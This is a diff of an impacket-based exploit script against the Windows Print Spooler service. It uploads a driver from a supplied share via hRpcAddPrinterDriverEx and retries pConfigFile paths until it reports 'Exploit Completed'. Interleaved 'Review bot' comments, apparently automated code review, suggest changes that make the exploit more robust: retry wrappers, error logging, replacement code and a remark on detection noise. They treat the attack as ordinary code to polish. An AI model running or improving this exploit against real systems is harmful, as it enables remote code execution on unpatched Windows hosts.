|
|
|
@ -3,7 +3,7 @@ from impacket.dcerpc.v5 import rprn |
|
|
|
|
from impacket.dcerpc.v5 import transport |
|
|
|
|
import argparse |
|
|
|
|
import sys |
|
|
|
|
|
|
|
|
|
import time |
|
|
|
|
|
|
|
|
|
def connect(username, password, domain, lmhash, nthash, address, port): |
|
|
|
|
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) |
|
|
|
@ -50,29 +50,19 @@ def main(username, password, domain, lmhash, nthash, address, port, share): |
|
|
|
|
|
|
|
|
|
print("[*] Uploading {0}".format(share)) |
|
|
|
|
|
|
|
|
|
#stage 0 |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage0: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
#stage 1 |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage1: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
#stage 2 |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage2: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
#stage 3 |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage3: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
if (resp['ErrorCode'] == 0): |
|
|
|
|
print("[+] Exploit Completed") |
|
|
|
|
else: |
|
|
|
|
print("[-] Not Completed") |
|
|
|
|
for i in range(1, 50): |
|
|
|
|
try: |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) |
|
|
|
|
if (resp['ErrorCode'] == 0): |
|
|
|
|
print("[+] Exploit Completed") |
|
|
|
|
sys.exit() |
|
|
|
|
except Exception as e: |
|
|
|
|
#print(e) |
|
|
|
|
pass |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == '__main__': |
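Review bot: The retry loop `for i in range(1, 50)` silently discards every failure — `except Exception as e:` with `#print(e)` commented out and a bare `pass` — so an access-denied or path-not-found returned by the spooler for one `old\N` path is indistinguishable from a transport error, and the operator only sees `Stage{i}` lines for attempts that returned without raising. Replace the two swallowed lines with `print("[-] Stage{0} failed: {1}".format(i, e))` (and, ideally, narrow the `try` to the single `hRpcAddPrinterDriverEx` call so a typo in the path formatting is not hidden too). Note also that `range(1, 50)` stops at `old\49`, and that the `sys.exit()` on success is what stops the outer re-run calls in `__main__`; that coupling deserves a comment on that line, e.g. `# SystemExit also aborts the retry wrapper in __main__`. The hunk header's counts (-29/+19) are consistent with the loop being the added code and the explicit stage 1–3 blocks being removed, but the `+`/`-` markers are lost in this rendering, so that reading is inferred; the enclosing `main` starts before this hunk.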
|
|
|
@ -122,5 +112,12 @@ Example; |
|
|
|
|
lmhash = '' |
|
|
|
|
nthash = '' |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#re-run if stage0/stageX fails |
|
|
|
|
print("[*] Try 1...") |
|
|
|
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |
|
|
|
|
time.sleep(10) |
|
|
|
|
print("[*] Try 2...") |
|
|
|
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |
|
|
|
|
time.sleep(10) |
|
|
|
|
print("[*] Try 3...") |
|
|
|
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |
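Review bot: The three copied `main(...)` calls only reach "Try 2" when `main` returns normally, but the stage-0 `hRpcAddPrinterDriverEx` call inside `main` (before this hunk) is not inside any `try`; impacket's `dce.request` appears to raise `DCERPCSessionError` for a non-zero ErrorCode by default, so a stage-0 failure surfaces as a traceback and the re-run promised by `#re-run if stage0/stageX fails` never happens. Wrap each attempt in `try/except Exception` that logs the error and sleeps before the next try; the success path is unaffected because `sys.exit()` in `main` raises `SystemExit`, which `except Exception` does not catch. A loop also removes the triplicated call and makes the attempt count and the 10 s delay named constants (exposing the delay via argparse would be better still, but the option parsing sits outside this hunk). Each attempt is a separate connection and RPC call against the target's spooler, so the retry count is also a noise/detection trade-off worth a comment.
```python
# … unchanged: credential / option parsing …
MAX_TRIES = 3
RETRY_DELAY = 10  # seconds between attempts; let the spooler settle
for attempt in range(1, MAX_TRIES + 1):
    print("[*] Try {0}...".format(attempt))
    try:
        main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
    except Exception as e:
        # stage 0 inside main() is unguarded; without this a DCERPC error aborts
        # the script before the next try. SystemExit from a success still propagates.
        print("[-] Try {0} failed: {1}".format(attempt, e))
    if attempt < MAX_TRIES:
        time.sleep(RETRY_DELAY)
```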